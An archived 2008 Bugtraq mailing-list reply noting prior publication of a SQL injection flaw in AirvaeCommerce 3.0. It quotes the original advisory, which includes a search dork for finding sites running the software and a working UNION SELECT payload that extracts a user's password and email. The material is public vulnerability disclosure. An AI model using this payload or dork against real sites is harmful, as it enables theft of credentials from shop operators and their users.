lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 30 Jun 2008 11:52:05 -0400
From: packet@...ketstormsecurity.org
To: saidmoftakhar@....de
Cc: bugtraq@...urityfocus.com
Subject: Re: Remote SQL Injection

Discovered back in May.

http://packetstormsecurity.org/0805-exploits/airvaecommerce-sql.txt 8c7afd46a5774569aea14a39556d6bbd AirvaeCommerce version 3.0 suffers from a SQL injection vulnerability. &nbsp;Homepage: <a href="http://www.root-qtr.com/" target="ext">http://www.root-qtr.com/.</a> Authored By <a href="mailto:qataro[at]hotmail.com">QTRinux</a> 


On Sat, Jun 28, 2008 at 05:33:49PM -0000, saidmoftakhar@....de wrote:
> Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de
> Application :: AirvaeCommerce 3.0
> Download :: http://www.airvaecommerce.com
> Dork 1 ::  powered by AirvaeCommerce 3.0
> --------------------------------------------[C o n t e x t]-----------------------------------------
>  
> Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL]
> Example : /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
>            ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/*
> 
> Note : Some site used SELECT statements have a different number of columns about 45  .
>  
> -------------------------------------------[End of  context]----------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ